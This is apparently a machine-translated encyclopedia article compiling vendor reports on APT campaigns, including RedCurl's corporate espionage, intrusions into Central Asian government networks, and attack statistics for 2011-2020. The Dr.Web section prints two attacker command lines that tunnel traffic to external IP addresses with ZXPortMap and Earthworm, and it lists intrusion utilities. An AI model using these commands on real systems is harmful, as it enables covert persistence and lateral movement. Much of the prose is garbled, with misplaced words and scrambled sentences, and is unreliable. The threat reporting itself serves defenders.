The group acted as covertly as possible to minimise the risk of detection on the victim's network. In all campaigns, RedCurl's main goal was to steal confidential corporate documents - contracts, financial documents, personal files of employees, documents on court cases, construction of facilities, etc. All this may indicate the custom nature of RedCurl attacks aimed at unfair competition.

It is noteworthy that one of the likely victims of the group was an employee of an information security company that provides customers with protection against such attacks. In total, Group-IB was able to identify 14 organizations that were victims of espionage by RedCurl. Some were attacked several times. Group-IB specialists contacted each affected organization. A number of them are responding.

The earliest known RedCurl attack was recorded in May 2018. As with all of the group's future campaigns, the primary vector was an elaborate phishing email. The group examines in detail the infrastructure of the target organization; each letter is drawn up not just for the victim organization, but for a specific team within it. Most often, the attackers sent their letters on behalf of the HR department. As a rule, the attack went to several employees of the same department in order to reduce their vigilance, for example, everyone received the same newsletter for annual bonuses. The phishing letter is compiled as well as possible - it includes a signature, logo, fake domain name of the company. Group-IB Threat Intelligence experts emphasize that RedCurl's approach resembles sociotechnical attacks by pentest specialists, in particular, Red Teaming (a service to test the organization's ability to repel complex cyber attacks using methods and tools from the arsenal of hacker groups).

To deliver the payload, RedCurl uses archives, links to which are placed in the body of the letter and lead to legitimate ones. cloudy storages The links are disguised so that the user does not suspect that by opening an attachment with a bonus document allegedly from the official website, he initiates the deployment of a Trojan controlled by attackers through the cloud on the local network. Troyan loader - skipping attackers into the target system, which will install and run the rest of the HVE modules. Like all of the band's own toolkit, the dropper was written in PowerShell.

RedCurl's main goal is to steal documentation from the victim's infrastructure and corporate correspondence. Once online, attackers scan a list of folders and office documents available from an infected machine. Information about them is sent to the cloud, and the RedCurl operator decides which folders and files to upload. In parallel, all files found on network disks with the extensions *.jpg, * .pdf, *.doc, *.docx , *.xls, *.xlsx were replaced with shortcuts in the form of modified LNK files. When another user opens such a file, RedCurl.Dropper starts. Thus, RedCurl infect more machines within the victim organization and move through the system.

Also, attackers seek to obtain credentials from email. To do this, use the LaZagne tool, which extracts passwords from memory and from files saved in the victim's web browser. If the required data cannot be obtained, RedCurl uses a Windows PowerShell script that shows the victim a MicrosoftOutlook phishing pop-up window. As soon as access to the victim's email is obtained, RedCurl analyzes and uploads all documents of interest to their cloud storage.

In the course of responding to incidents related to the RedCurl group, Group-IB DFIR specialists found out that after receiving the initial access, the attackers are on the victim's network for 2 to 6 months. Trojan RedCurl.Dropper, like the rest of the group's tools, does not connect to the server directly to the intruders' command. Instead, all interaction between the victim's infrastructure and the attackers takes place through legitimate cloud storage, such as, Cloudme koofr.net, pcloud.com and others. All commands are given in the form of PowerShell scripts. This allows RedCurl to remain invisible to traditional defenses for a long time.

File:Aquote1.png
Corporate espionage as an element of unfair competition - as of August 2020, a rather rare phenomenon in the APT world. For RedCurl, there is no difference in who to attack: a Russian bank or a consulting company in Canada. Such groups specialize in corporate espionage, using techniques to hide their activity, including by using legitimate tools that are difficult to detect. The contents of other people's letters are much more valuable to them than the contents of other people's wallets. Despite the lack of direct financial damage, as in the case of financially motivated cyber-criminal groups, the consequences of espionage activities can run into tens of millions of dollars.

told Rustam Mirkasymov, Head of Dynamic Malware Analysis at Group-IB
File:Aquote2.png

For August 2020, Group-IB continues to record RedCurl attacks in different countries of the world.

Study of APT attacks on government agencies in Kazakhstan and Kyrgyzstan

In March 2019, a client from a state institution of the Republic of Kazakhstan contacted Doctor Web on the issue of malware on one of the computers on the corporate network. This was reported to "Dr.Web" by TAdviser on July 22, 2020. This appeal led to the start of an investigation, as a result of which the company's specialists discovered and for the first time described a group of Trojan programs used for a full-scale targeted attack on the institution. The materials at the disposal of the "Dr.Web" made it possible to get an idea of ​ ​ the tools and targets of attackers who penetrated the internal computer network. The investigation found that the institution's network infrastructure had been compromised since at least December 2017.

"Dr.Web" studied targeted cyber attacks on state institutions of Kazakhstan and Kyrgyzstan

In addition, in February 2020, representatives of the state institution of the Kyrgyz Republic contacted Doctor Web with signs of infection of the corporate network. The Dr.Web examination established the presence of a number of malicious programs on the network, some modifications of which were also used in the attack on the organization in Kazakhstan. The analysis showed that, as in the previous case, the infection began long before the appeal - in March 2017.

Considering that the unauthorized presence in both infrastructures continued for at least three years, and the fact that when examining reports from servers, completely different families of Trojan programs were identified, in Dr.Web admits that several hacker groups can be behind these attacks at once. At the same time, some of the Trojans used are well known: some of them are tools of well-known APT groups, the other part is used by various APT groups in China.

The company managed to study in detail information from several intranet servers belonging to the affected institutions of Kazakhstan and Kyrgyzstan. All devices considered in the study run Microsoft Windows operating systems.

Malware that was used in a targeted attack can be roughly divided into two categories:

  • mass, which were installed on most computers of the network;
  • specialized ones that were placed on servers of particular interest to the attacker.

The studied malware samples and the utilities used by attackers suggest the following attack scenario. After exploiting vulnerabilities and gaining access to a network computer, attackers downloaded one of the modifications of the BackDoor.PlugX family Trojan to it. The Trojan's payload modules made it possible to remotely control the infected computer and use it to further advance through the network. Another Trojan believed to be used for primary infection was BackDoor.Whitebird.1. The backdoor was intended for 64-bit operating systems and had quite universal functionality: support for an encrypted connection to the control server, as well as file manager, proxy and remote management functions through the command shell.

After establishing the presence on the network, the hacker group used specialized malware to solve the tasks. The distribution of specialized Trojan programs to infected devices is presented below.

  • Domain controller# 1:
    • Trojan.Misics
    • Trojan.XPath

  • Domain controller# 2:

    • Trojan.Misics
    • Trojan.Mirage

  • Domain controller# 3:

    • BackDoor.Mikroceen
    • BackDoor.Logtu

  • Server# 1:

    • BackDoor.Mikroceen

  • Server# 2:

    • Trojan.Mirage

  • BackDoor.CmdUdp.1

Of these Trojans, the XPath family deserves special attention, whose representatives, according to Dr.Web experts, were not previously publicly described. The family has a rootkit to hide network activity and traces of presence in a compromised system, which was discovered using the Dr.Web anti-rootkit installed on the attacked server. The samples studied were compiled in 2017-2018. At the same time, these programs are based on open source projects that were released several years earlier. Thus, the tested samples used versions of the 2013-2015 WinDivert package. This indirectly indicates that the first XPath modifications could also have been developed during this period.

XPath is a modular Trojan, each component of which corresponds to a certain stage of malware. The process of infection begins with the operation of the component installer, detected as Trojan.XPath.1. The installer uses an encrypted configuration wired in its body and starts the payload either by installing the driver or by COM Hijacking. The program uses the system registry to store its modules, while using both encryption and data compression.

Trojan.XPath.2 is a driver and serves to hide the presence of malicious activity in a compromised system by running another module in parallel. The driver has Chinese digital signatures, and its work is based on open source projects. Unlike other components stored in the system registry, the driver files are located on disk, while the program works secretly. In addition to hiding the driver file on disk, the component's tasks include injecting a payload loader into the lsass.exe process, as well as masking the Trojan's network activity. The operating scenario varies depending on the version of the operating system.

The original name of the third component is PayloadDll.c. The library detected as Trojan.XPath.3 is an intermediate module and serves to implement the COM Hijacking method into the svhost.exe process of the payload, which is stored in the registry.

The main functionality is contained in the payload module detected as Trojan.XPath.4. The component is written in C++ and is also based on open source projects. Like most of the malware examined in the study, this Trojan is designed to gain unauthorized access to infected computers and steal confidential data. Its feature is the ability to function in two modes. The first is Client Mode. In this mode, the Trojan connects to the control server and waits for incoming commands. The second is Agent Mode. In this mode, the Trojan.XPath.4 performs the functions of a server: it listens to certain ports, waiting for other clients to connect to them and sending commands to them. Thus, the developers provided a scenario for deploying a local control server inside the attacked network to redirect commands from the external control server to infected computers inside the network.

Other interesting finds include the peculiarity of implementing access to the command shell of the Mirage Trojan. To redirect the I/O of the command shell, the malware used files that we were able to obtain from the infected server. Thus, it was possible to see the commands executed by the attackers using the presented Trojan function, as well as the data received in response:

The windbg.exe file launched was a PortQry TCP/UPD port scanner.

During the investigation, Dr.Web specialists discovered evidence indirectly confirming the connection of targeted attacks on institutions of Central Asian states. For example, one of the BackDoor.PlugX.38 samples found used the nicodonald [.] accesscam [.] org domain as a control server, which was also used as a control server for the BackDoor.Apper.14, also known as ICEFOG NG. A few years ago, the backdoor of this family was discovered in a phishing letter sent to one of the state institutions in Kazakhstan. In addition, an RTF document installing this BackDoor.Apper.14 sample was first uploaded to VirusTotal from Kazakhstan on March 19, 2019.

An interesting find in the incident in Kyrgyzstan was the Logtu backdoor, found on an infected server along with Mikroceen. In addition to a similar set of malicious ON ones used by attackers, it is Mikroceen that allows us to talk about a possible connection between two attacks: a sample of this highly specialized backdoor was found on both networks and in both cases was installed on a domain controller.

During the search for samples related to these attacks, a specially prepared backdoor was found that implements BIND Shell access to the command shell. The path to the debug characters contains the name of the project in Chinese - 正向马源码, which may indicate the corresponding origin of the Trojan.

In addition to malware, the following publicly available utilities were used by attackers to further advance over the network:

  • Mimikatz
  • TCP Port Scanner V1.2 By WinEggDrop
  • Nbtscan
  • PsExec
  • wmiexec.vbs
  • goMS17-010
  • ZXPortMap v1.0 By LZX
  • Earthworm
  • PortQry version 2.0 GOLD

The following are examples of running some of the listed utilities.

  • ZXPortMap: vmwared.exe 21 46.105.227.110 53
  • Earthworm: cryptsocket.exe -s rssocks -d 137.175.79.212 -e 53

The APT group also actively used its own PowerShell scripts to collect information about an infected computer, other network devices, check control servers from an infected computer, and similar tasks. In addition, a PowerShell script was found to upload the entire contents of mailboxes of several employees of the organization from Microsoft Exchange Server.

During the investigation, Dr.Web specialists managed to find several families of Trojan programs used in these attacks at once. Analysis of samples and malicious activity showed that the hacking of the network infrastructure occurred long before the detection of the first signs of infection by employees of the organization. Unfortunately, such a scenario is one of the attributes of successful APT attacks, since significant resources of virus writers are always aimed at hiding their presence in the system.

The primary vector of infection remained outside the study brackets, as well as the overall picture of infection of the entire infrastructure. We are confident that the Trojans described in the study are only part of the malware involved in these attacks. The mechanisms used by hackers make it repeatedly difficult not only to detect an unauthorized intrusion, but also to regain control over network objects.

To minimize risks, you need to constantly monitor intranet resources, especially those servers that are of increased interest to attackers - domain controllers, mail servers, Internet gateways. In the event of a compromise of the system, an operational and correct analysis of the situation is required to develop adequate countermeasures.

2019

TAdviser and Microsoft study: 39% of Russian SMB companies faced targeted cyber attacks

According to a study by TAdviser and Microsoft in the fall of 2019, 39% of small and medium-sized businesses faced targeted attacks over the year. According to Positive Technologies, more than 50% of SMB companies assign a high level of danger to the risk of APT attacks *.

Growth of targeted attacks in the third quarter

On November 22, 2019, Positive Technologies experts summed up the results of the third quarter of 2019. Among the main trends are an increase in the number of unique cyber incidents, high activity of APT cyber groups specializing in targeted attacks, as well as a twofold predominance of the share of cyber attacks aimed at stealing information over the share of financially motivated campaigns.

Dynamics of attacks according to Positive Technologies

The main trend is the predominance of targeted attacks over mass ones. Their share is 65% against 59% in the second quarter. According to Positive Technologies, government agencies, industrial companies, the financial sector and the field of science and education are of greatest interest to attackers. Throughout the third quarter, PT Expert Security Center (PT ESC) experts regularly recorded attacks by the TA505 APT group. The arsenal of the grouping includes the banking Trojan Dridex, the Cryptomix ransomware, the code of which is signed with certificates issued to dummy legal entities, Trojans for remote control of ServHelper and FlawedAmmyy, as well as the Upxxec plugin, capable of detecting and disabling a large number of anti-virus protection tools. In addition, PT ESC specialists recorded cyber attacks by APT groups RTM, Cobalt, Bronze Union, APT-C-35, KONNI, Gamaredon and others.

In the third quarter of 2019, the share of cyberattacks aimed at stealing information rose to 61% in attacks on legal entities and to 64% in attacks on individuals (58% and 55% in the second quarter). At the same time, the share of financially motivated campaigns does not exceed 31%.

Categories of victims of attacks according to Positive Technologies

In attacks on legal entities, a quarter of the total amount of stolen information is personal data. One in five attacks targeted individuals, with almost half (47%) of all data stolen from them - credentials in various systems (logins and passwords).

Positive Technologies experts recorded a decrease in the proportion of attacks used cryptocurrency miners - up to 3% in the case of organizations and up to 2% in campaigns aimed at individuals. This fact may be associated with the gradual transition of attackers to, HVE which is capable of performing several functions at once. For example, the Clipsa Trojan is able to secretly "mine," cryptocurrency steal passwords, replace the addresses of crypto wallets, and also launch brute force attacks against sites based on. WordPress

File:Aquote1.png
"Social engineering methods are still popular: in the third quarter, the share of attacks on legal entities with their use almost doubled - to 69% (from 37% in the previous quarter). In 81% of cases, infection of companies' infrastructure with malware begins with a phishing email, "

noted Yana Avezova, analyst at Positive Technologies
File:Aquote2.png

Types of malware used for attacks

The share of malware infections is growing. Three quarters of attacks on legal entities and 62% of attacks on individuals were accompanied by infections of various kinds of malware. If infection of the company's infrastructure begins, as a rule, with a phishing email, then individuals are more often victims as a result of visiting compromised web resources (in 35% of attacks against individuals).

Positive Technologies experts also found that at the end of summer, after several months of calm, one of the largest botnets in the world called Emotet resumed activity. Botnet operators work according to the malware as a service (MaaS) scheme and provide to cybercriminals access to to computers those infected with Emotet for their further infection with other malware, for example Trickbot or Ryuk.

According to researchers, information about most cyber attacks on organizations is not made public due to reputational risks.

Analysis of peculiarities of APT attacks in industry and fuel and energy complex

On November 18, 2019, Positive Technologies announced that its experts had analyzed the activities of APT groups attacking Russian organizations over the past two years. Nine of them focus on organizations of the fuel and energy complex (fuel and energy complex), and 13 associations of cybercriminals see industrial companies as a goal. Some groups attacked both industrial and energy companies.

In the last two studies, Positive Technologies experts described the specifics of APT attacks on industrial companies and fuel and energy complex organizations. In addition, experts conducted a survey among visitors to the Positive Technologies website, the audience of the SecurityLab.ru Internet portal and members of a number of industry communities.

According to this survey, more than half (60%) of respondents from the industry and the fuel and energy complex admit that the likelihood of a successful cyber attack is quite high. At the same time, only 11% of the survey participants are confident that their company will be able to withstand the APT attack.

Most representatives of organizations believe that the main goal of the APT group when attacking their companies will be to disrupt technological processes and disable infrastructure. At the same time, 55% of the survey participants reported that their organizations had already become victims of attacks. Every fourth participant noted that one of the results of such an attack was a simple infrastructure.

At the same time, many companies use only basic security tools that are practically useless to counter complex threats such as APT. Thus, only 5% of respondents working in industrial and fuel and energy companies reported that their organizations use specialized tools to combat targeted attacks.

In practice, typical security solutions are ineffective in countering APT attacks. Cyber ​ ​ groups confuse their code so harmful ON that anti-virus decisions on computers employees cannot recognize the threat at the time of the attack. Five of the nine groups aimed at the fuel and energy complex use, which runs malware immediately in RAM and leaves no traces on. hard drive Cybercriminals add malware to special modules to determine the version of antivirus used in the system, as well as modules to detect execution in the sandbox and virtual environment, which allows you to bypass dynamic checks of security systems at the time of the attack.

Most APT groups cipher communications channel with command to servers hide malicious traffic and trick intrusion detection systems. In attacks on industrial companies, every second group (46%) uses known ones for this purpose, and algorithms enciphering 38% use their modified versions. Malicious traffic is often disguised as legitimate: in attacks on the industrial sector, 77% of APT groups exchange information with the command center over widespread protocols. Separate groups aimed at the fuel and energy sector place command offices at servers addresses that are similar to the names of well-known companies in the industry.

Attackers are not stopped even by the complete isolation of the technological segment of the network from its corporate segment and the Internet. If their target is in the industrial segment, then removable media (for example, flash drives) with malware can be thrown into the company, or they can be connected to USB connectors of critical systems by an insider who has infiltrated the company (Replication Through Removable Media technique).

According to Alexei Novikov, director of the Positive Technologies Security Center (PT Expert Security Center), often a more effective approach to detecting APT is to identify the activity of attackers after entering the infrastructure:

File:Aquote1.png
Identifying an APT attack when an intruder enters a company is an extremely difficult task, but if the attacker's goal is to reliably gain a foothold in the IT infrastructure and control key systems for the longest possible time, then it can be detected at later stages of the attack, for example, when it moves between servers already on the internal network. Such movements certainly leave artifacts in network traffic and on the nodes themselves, this allows you to detect the previous penetration retrospectively and eliminate the threat before the attacker proceeds to active destructive actions or steals important information.
File:Aquote2.png

APT group Calypso attacks government agencies of 6 countries

On October 31, 2019, Positive Technologies (PT Expert Security Center) announced that its experts at the security expert center identified an APT group called Calypso. The group has been operating since 2016 and targets government agencies. As of October 2019, it operates in six countries.

According to experts, organizations from India (34% of victims), Brazil, Kazakhstan (18% each), Russia, Thailand (12% each) and Turkey (6%) have already suffered from the actions of the group. The attackers hacked into the network perimeter and placed a special program on it, through which they gained access to the internal networks of compromised organizations. As the investigation showed, attackers are moving inside the network either by exploiting a vulnerability in the remote execution of MS17-010 code, or by using stolen credentials.

File:Aquote1.png
The success of the attacks of this group is largely facilitated by the fact that most of the utilities it uses to promote within the network are widely used by specialists around the world for network administration. The grouping used public utilities and exploits, for example SysInternals, Mimikatz; EternalBlue, EternalRomance. With common exploits, criminals infect computers on the organization's local network and steal confidential data,
told Denis Kuvshinov, lead specialist of the cyber threats research group
File:Aquote2.png

According to Positive Technologies experts, the organization can prevent such attacks using specialized deep traffic analysis systems that will allow calculating suspicious activity at the initial stage of intruders' penetration into the local network and prevent them from gaining a foothold in the company's infrastructure. In addition, monitoring information security events, protecting the perimeter and web applications will help detect and counteract attacks.

According to the data obtained, the identified APT group is believed to have Asian roots and is among the Chinese speakers. In one of the attacks, the group used PlugX malware, which is traditionally used by many APT groups of Chinese origin, as well as the Byeby Trojan, which was used in the SongXY malware campaign in 2017. In addition, during separate attacks, attackers mistakenly revealed their real IP addresses belonging to Chinese providers.

APT group technicians in attacks on credit and financial institutions

On October 10, 2019, the company Positive Technologies reported that its experts analyzed the tactics and techniques of ten APT groups that attacked financial companies over the past two years[18]found out that each of them resorted to, and in to phishing search of bank systems on the network criminals use legitimate utilities for administration and compromised credentials. data

Figure 1. Top 5 estimated targets of APT groups (proportion of respondents representing financial companies)

The researchers talked about the techniques that APT groups use to penetrate the IT infrastructure of financial companies, and how they operate inside, and also found out at what stages an attack can be identified and money theft prevented.

Figure 2. Top 5 consequences of cyber attacks (proportion of respondents representing financial companies)

Experts called phishing the most common and effective way to penetrate the internal network of any company.

File:Aquote1.png
According to our data, 75% of banks are vulnerable to phishing attacks. This method has proven itself so well among cybercriminals that every APT group we have investigated has resorted to it, seen in attacks on the credit and financial sector,
says Ekaterina Kilyusheva, senior analyst at Positive Technologies
File:Aquote2.png

According to a study by Positive Technologies, financial institutions have a large budget for information security, and their security systems are at a high level. According to Alexei Novikov, director of the Positive Technologies (PT Expert Security Center) security expert center, this explains the large number of techniques used by APT groups to bypass protective equipment.

Figure 3. Protections used in companies (proportion of respondents representing the financial industry)
File:Aquote1.png
For example, to avoid detection by an antivirus, malware is delivered to the infrastructure in packed and encrypted form (obfuscated files or information and software packaging techniques). Attackers can pass off malicious code as legitimate software by signing it with a digital certificate of a real company (code signing technique). To hide control channels and additional masking, well-known web services can be used, as in the case of the Carbanak group, which used Google Docs and Pastebin services to store its scripts,
notes Alexey Novikov
File:Aquote2.png

Figure 4. Common categories of victims (proportion of groups)

According to statistics, for several days, and sometimes weeks, attackers study the network in preparation for theft. Criminals actively move between network nodes in search of banking systems, using legitimate utilities for administration (service execution techniques and Windows admin shares) and compromised accounts. According to experts, it is at this stage that attackers leave many traces, and you can notice suspicious actions in the system. Constant monitoring of information security events, as well as in-depth analysis of network traffic in real time and in retrospect, can recognize an APT attack before criminals gain access to banking systems.

File:Aquote1.png
FinCERT organizes a convenient and effective exchange channel information on threats between financial institutions. However, it is important not only to know about the latest indicators of compromise, but also to use technical solutions that can use such indicators, and most importantly, search for these indicators in the past. This approach helps to identify the presence of attackers in the infrastructure even if nothing was known about it at the time of the attack,
emphasizes Alexey Novikov
File:Aquote2.png

According to the data obtained, some financial institutions use only basic means of protection, which are not enough to timely identify complex targeted attacks and fully analyze the events that have occurred. Only 22% of respondents representing the financial industry believe that their company is able to repel attacks by APT groups. At the same time, 63% of respondents in practice faced the consequences of cyber attacks, and 34% admitted that the organization suffered direct financial losses.

According to Positive Technologies:

  • 5 out of 10 groups use compromised third-party resources to spread malware
  • 9 out of 10 groups use malicious scripts (Scripting)
  • 8 out of 10 groups encrypt malware (Obfuscated Files or Information)
  • 6 out of 10 groups inject malicious code into the memory of a legitimate process (Process Injection)
  • 5 out of 10 groups mask services (Masquerading)
  • 4 out of 10 groups sign malicious code with a digital certificate (Code Signing)
  • 4 out of 10 groups use popular web services to store malicious files (Web Service)
  • 4 out of 10 groups check for sandbox (Virtualization/Sandbox Evasion)

2017: Technology of protection against threats of remote administration from LC

On December 13, 2017, it became known about the registration of a Kaspersky Lab patent for a technology for protecting against targeted attacks.

The product is based on algorithms machine learning and automates the detection of one of the dangerous cybercriminal tools - utilities for covert remote control. computer At the same time, the technology works even in cases where criminals transfer data over encrypted communication channels.

Remote computer management utilities are used by target attack organizers to stealthily carry out malicious activity on victims' devices. After installation, the program receives administrator rights on the computer and gives attackers the opportunity to search for confidential information on it, which is then transmitted to the command server. Such a scenario is dangerous for corporate networks.

Kaspersky Lab technology analyzes the activity of all applications on the user's computer and detects cases of abnormal behavior. It detects all dependencies between events on the device. Comparing them with established behavioral patterns, the technology decides to detect a remote attack on a computer. Then it is established which application is used for remote administration. The danger can be both unknown utilities and compromised trusted applications or their individual components[19].

2016: Russian Embezzlement Market Assessment

2015: Overview of emerging APT-class threats

In the first half of the 2010s, Kaspersky Lab's Center for Global Research and Threat Analysis tracked the activities of more than 60 criminal groups responsible for cyber attacks around the world. Their members speak a variety of languages: Russian, Chinese, German, Spanish, Arabic, Persian and others.

Surveillance of the activities of these criminal groups allowed the company to compile a list reflecting emerging APT-class threats. Here are the main ones:

  • Merger of cybercrime and APT threats: from end users, the vector of attacks shifts to conducting targeted attacks against the banks themselves;

  • Fragmentation of large APT groups: As a result of successful activities to investigate large incidents and publish information about large hacker groups and their leaders, some of the largest and most famous APT groups will break up into smaller groups operating independently of each other. The result will be attacks on a wider front. Accordingly, more companies will suffer as attacks by smaller groups will be more diversified.

  • The development of malicious methods and techniques: in the near future, the company expected the emergence of more complex embedded malicious modules, improved methods of bypassing protection and more active use of virtual file systems (Turla and Regin campaigns can be cited as examples) to hide valuable tools and stolen data.

  • New methods of transferring stolen data: long gone are the days when attackers could simply install a backdoor on a corporate network and start downloading terabytes of data to FTP servers scattered around the world. Today, advanced groupings regularly use SSL, as well as non-standard data transfer protocols. In the coming years, a number of groups will include the use of cloud services in their arsenal, which will allow them to more effectively hide the sending of data stolen from victims.

  • New APT campaigns from unexpected sources: In 2014, we were faced with the fact that several countries publicly expressed interest in possessing the ability to carry out APT-class attacks. We predict that new countries will enter the "cyber arms race" that will acquire tools for cyber espionage.

  • "Alien flag" attacks: Given the growing desire of government agencies to publicly denounce attackers, we believe that APT groups will make appropriate changes to the organization of their activities and will more often conduct malicious campaigns in which attackers can use "inactive" malware, usually used by other APT groups to confuse traces and complicate attribution.

  • Adding attacks on mobile devices to the arsenal of APT groups: we expect the active use of malware for mobile devices, primarily for devices running Android and the past jailbreak iOS.

  • ART + botnet: precisely calculated attack + mass surveillance. This year, new APT groups will join the trend of using point attacks in combination with attention-grabbing campaigns and organizing their own botnets.

  • Commercialization of APT campaigns and the private sector: In recent years, we have published many materials about malware created by companies such as HackingTeam and Gamma International - the most famous manufacturers of "legal" spyware. ON It's a high-yield, low-risk business. Therefore, we can expect the appearance of new players on the market of "legal" surveillance tools.

2014: Kaspersky Lab Data

In the summer of 2014, Kaspersky Kaspersky published a study on Business Information Security. In the period from April 2013 to May 2014, 3900 respondents (representatives of companies with knowledge of information security risks and having an impact on IT processes in their organizations) from 27 countries of the world, including Russia, were interviewed.

The top three priorities of IT managers compared to the previous year have been dramatically changed. 41% of respondents cited data protection from targeted attacks as a top priority. A year ago, this item was not included in the list of priorities of IT managers. First of all, representatives of medium-sized businesses (43%) and large enterprises (38%) called their priority to protect against targeted attacks. Small businesses are less interested in the issue of targeted attacks (32%).

Source: Kaspersky Lab, 2014

At the same time, among external IT security incidents, targeted attacks are not massive (10%). The number of incidents is still dominated by malware (77%), (spam 74%) and phishing attacks (28%). The increase in attention to targeted attacks, analysts said, is Kaspersky Lab primarily due to the consequences. For example, an attack by high-tech hackers on a large retailer Target allowed attackers to seize the personal data of 70 million customers of this chain store.

Source: Kaspersky Lab, 2014

IT experts note that targeted attacks account for a small proportion of the incidents that have been consulted. However, most of the respondents note that to prevent targeted attacks and detect hacking attempts in a timely manner, security tools of a higher class than antivirus software will be required. Kaspersky Lab experts are confident that to minimize risks in the event of targeted attacks, companies should take an integrated approach to ensuring information security.

Source: Kaspersky Lab, 2014

2011: The number of targeted attacks increased from 77 to 82 per day

The number of targeted attacks is growing, by the end of 2011 their number increased from 77 to 82 per day. Targeted attacks use social engineering and specialized malware to gain unauthorized access to confidential information. Traditionally, such attacks were aimed at the public sector and government bodies, but in 2011 their focus expanded.

Targeted attacks are not limited to large organizations. More than half of such attacks are directed at organizations with less than 2.5 thousand employees and almost 18% at organizations with less than 250 employees. These organizations can be attacked because they are in the supply chain or are partners in the ecosystem of large companies, while having weaker security systems. In addition, 58% of such attacks target ordinary employees: Human resources department, public relations and sales. People in these workplaces may not have access to the right information, but they may work as an entry into the company. Attackers can simply find their contacts on the network, in addition, these employees are used to receiving requests or some files from unknown persons.

Notes